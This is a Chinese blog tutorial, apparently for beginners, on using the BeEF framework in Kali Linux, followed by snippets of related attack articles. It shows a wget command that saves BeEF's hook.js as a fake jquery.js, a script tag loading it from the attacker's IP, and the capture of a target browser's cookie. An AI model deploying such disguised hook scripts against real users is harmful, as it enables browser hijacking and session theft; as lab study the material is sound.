kali linux小白学习（beef网络钓鱼攻击）

最新推荐文章于 2025-10-29 19:17:25 发布

原创最新推荐文章于 2025-10-29 19:17:25 发布 · 504 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#学习

文章详细介绍了如何使用Beef-XSS工具创建并部署XSS攻击。首先在Linux的/var/www/html目录下放置文件，然后通过wget将攻击脚本hook.js伪装成jquery.js。接着启动Apache2服务器，解析网页并响应用户请求。靶机访问含有攻击代码的页面后，Kali机器能够捕获到其cookie信息。

首先打开beef-xss工具

打开var/www/html文件并查看里面的文件（linux目录下有个目录:/var/www/html,把文件放到这个目录下就可以通过IP很方便的访问）

之后，执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令，执行ls命令可看出生成了一个攻击文件jquery.js，该文件包含xss攻击代码<script src=http://192.168.230.129:3000/hook.js></script>。

之后打开apache2服务器（apache两个主要作用：

1.解析网页语言，如html，php，jsp等

2.接收web用户的请求，并给予一定的响应）

之后进入靶机，把kali机的ip地址输入，可以看到上钩了。

回到kali机，可以看到上钩了，我可以查看他的cookie了。

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Build23

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

kali linux钓鱼教程,Kali linux建立钓鱼热点

weixin_34012355的博客

05-09

1624

主要内容：参考网上多篇文章，自己动手完全实验成功，在这里详细记录自己在kalilinux下的搭建过程，本文着重于动手实现，不涉及原理，关于原理应该会在之后的单独文章中详细探究实验环境：Host 主机： Windows 8 64位虚拟机软件：VirtualBox 4.3.8(需要安装同4.3.8版本拓展包和增强功能包，这是两个不同的包！安装增强包的时候需要安装相应的内核头文件和编译环境，这...

Kali Linux 三种网络攻击方法总结（DDoS、CC 和 ARP 欺骗）

2301_77160226的博客

08-15

3585

Kali Linux 作为一款专为网络安全专业人员和爱好者设计的操作系统，提供了丰富的工具来模拟和研究各种网络攻击手段。本文将深入探讨三种常见的网络攻击方法：DDoS（分布式拒绝服务）、CC（Challenge Collapsar）和 ARP 欺骗，并详细阐述其原理、常用工具、实际操作示例以及相应的防范措施。

2 条评论您还未登录，请先登录后发表或查看评论

beef-xss钓鱼

Williamanddog的博客

01-27

886

BeEF（Browser Exploitation Framework）是一款非常强大的Web框架攻击平台，集成了许多 payload，可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话，执行sudo apt install beef-xss进行安装。_ip:3000/clone_pikachu ，可以看到beef中有机器上线，在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。

利用beef-xss构造钓鱼网站|Kali下载安装beef|setoolk封装钓鱼网站

最新发布

2403_89760110的博客

10-29

354

4*.在后续运行beef时有些人可能会忘记密码，就像我这种傻子，但是不用怕直接把下面的命令输进去,就可以看到你的账户密码了。把ip改为自己的ip地址并插入前端页面下面就可以在beef 里可以等鱼儿上钩了。3.运行Beef-xss(运行结束后自动跳转到beef-xss界面)beef-xss初始账号密码均为：beef（可以进行修改）在终端显示的beef-xss界面中会出现下面语句。1.在终端输入以显示刚才复制的前端页面。（5）找到一个网址并复制进去。（3）凭证收集攻击方法。（1）社会工程学攻击。

初探BeEF

weixin_30258901的博客

01-23

363

1.什么是BeEF？就是The Browser Exploitation Framework 的缩写，意在通过一些手段，控制对方的浏览器。里面集成了很多模块，能够获取很多东西，有cookie，浏览器名字，版本，插件，是否支持java，vb，flash等，所以说XSS神器嘛。。大概长这个样子（默认用户名密码是beef，beef）： 2.安装beef和使用beef BT5...

BeEF-XSS在本机制作简易钓鱼网站

dasdasdasvsdV的博客

07-15

818

BeEF（Browser Exploitation Framework）是一款非常强大的Web框架攻击平台，集成了许多payload，可以通过XSS漏洞配合JavaScript脚本和Metasploit（MSF）进行渗透。基于Ruby语言编写，并且支持图形化界面，操作简单。

如何在Kali Linux中搭建钓鱼热点

weixin_33919950的博客

07-21

453

文中提及的部分技术可能带有一定攻击性，仅供安全学习和教学用途，禁止非法使用！ 0×00 实验环境操作系统：Kali 1.0 (VM) FackAP: easy-creds 硬件：NETGEAR wg111 v3 RTL8187B 网卡（kali下免驱）靶机：安卓、iPhone设备 0×01 环境搭建 git clone https://git...

Kali Linux网络渗透测试实战指南

07-31

本书《使用Kali Linux进行Web渗透测试》是一本面向专业渗透测试人员的实用指南，帮助读者掌握使用Kali Linux进行网站、网络应用和标准网络协议渗透测试的策略。书中详细介绍了渗透测试的基础知识、方法论、风险评估...

Kali Linux下利用Beef攻击浏览器实战详解

"kali-beef攻击浏览器用于运维安全测试，涉及Kali Linux系统、BEEF（Browser Exploitation Framework）工具、钓鱼网站设置以及对浏览器的潜在攻击手段。" Kali Linux是一个基于Debian的Linux发行版，专为网络安全和...

Kali Linux 2024.4 QEMU AMD64镜像安装包

05-03

内容概要：本文提供了一个大文件的下载链接，文件名为“kali-linux-2024.4-qemu-amd64.7z”，由于文件体积较大，故存储于百度网盘中。文中给出了具体的访问链接和提取码，并提醒读者将文件转存至自己的网盘以免丢失...

精选资源

Kali Linux渗透测试技术详解

02-19

介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用，介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试，介绍了权限提升、密码攻击、无线网络攻击、...

xss--钓鱼（beef）

qq_51802152的博客

10-26

352

kali---beef 牛肉的使用

linux安装BEEF

weixin_72453966的博客

03-26

224

BeEF（The Browser Exploitation Framework）是一款强大的浏览器渗透测试框架，主要用于对浏览器进行安全评估和攻击。通过控制受害者的浏览器，渗透测试人员可以执行多种攻击技术，如窃取信息、执行恶意代码等。BeEF 的目标是揭示现代浏览器的安全风险，并为安全研究人员提供一个强大的测试平台。跨平台支持：兼容多种操作系统，如 Windows、Linux、macOS。多种攻击模块：提供多种预定义的攻击模块，方便快速测试。实时控制：通过实时控制面板监控和操作受害者的浏览器。

Kali之Beef利用Xss进行钓鱼

My灬Futrue的博客

07-07

2082

1、操作准备攻击机：Kali（ip地址：192.168.1.107）受害者：Windows7 x64（ip地址：192.168.1.163） 2、配置Beef 进入beef的配置文件里 root@kali:~# vim /etc/beef-xss/config.yaml 在这里可以看到beef的默认用户名和密码，也可以进行修改，我这里对默认的密码进行了修改注：（默认beef用户名和密码位User：beef，Password：beef） 3、启动Beef root@kali:~# beef-xss

BeEf：利用跨站脚本漏洞进行钓鱼

qq_42773814的博客

01-19

2906

BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台，专注于利用浏览器漏洞，它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作，只要访问了嵌入 hook.js 的页面，抑或执行了 hook.js 文件的浏览器，就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。最新的kali系统已经不会默认安装 BeEf ，需要我们自行安装。 apt install beef-xss 安装完成后，直接

跨站脚本攻击（XSS）利用（手工制作、Cobalt Strike钓鱼、BeEF钓鱼）

2402_84408069的博客

07-16

1420

摘要：本文介绍了三种网络钓鱼技术方法。首先解析了钓鱼网站的基本原理和危害性，然后详细展示了Flash钓鱼的构建过程，包括页面克隆、JS脚本编写和服务器部署。其次讲解了Cobalt Strike工具的配置和使用方法，演示了如何克隆目标网站并捕获用户凭据。最后简要提及了BeEF框架在钓鱼攻击中的应用。这些技术仅供网络安全研究，严禁非法使用。文章通过具体操作步骤和截图，完整呈现了钓鱼攻击的实现流程。

Linux自动化简单安装beef xss framework的方法及BeEF的启动

01-28

3895

Linux中BeEF的安装

beef结合msf钓鱼

weixin_34174132的博客

03-17

733

Kali linux 系统默认未安装beef，需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1：3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...

如何使用 BeEF 黑客工具（非常详细），零基础入门到精通，看这一篇就够了

分享Python知识

10-26

2428

如何使用 BeEF 黑客工具（非常详细），零基础入门到精通，看这一篇就够了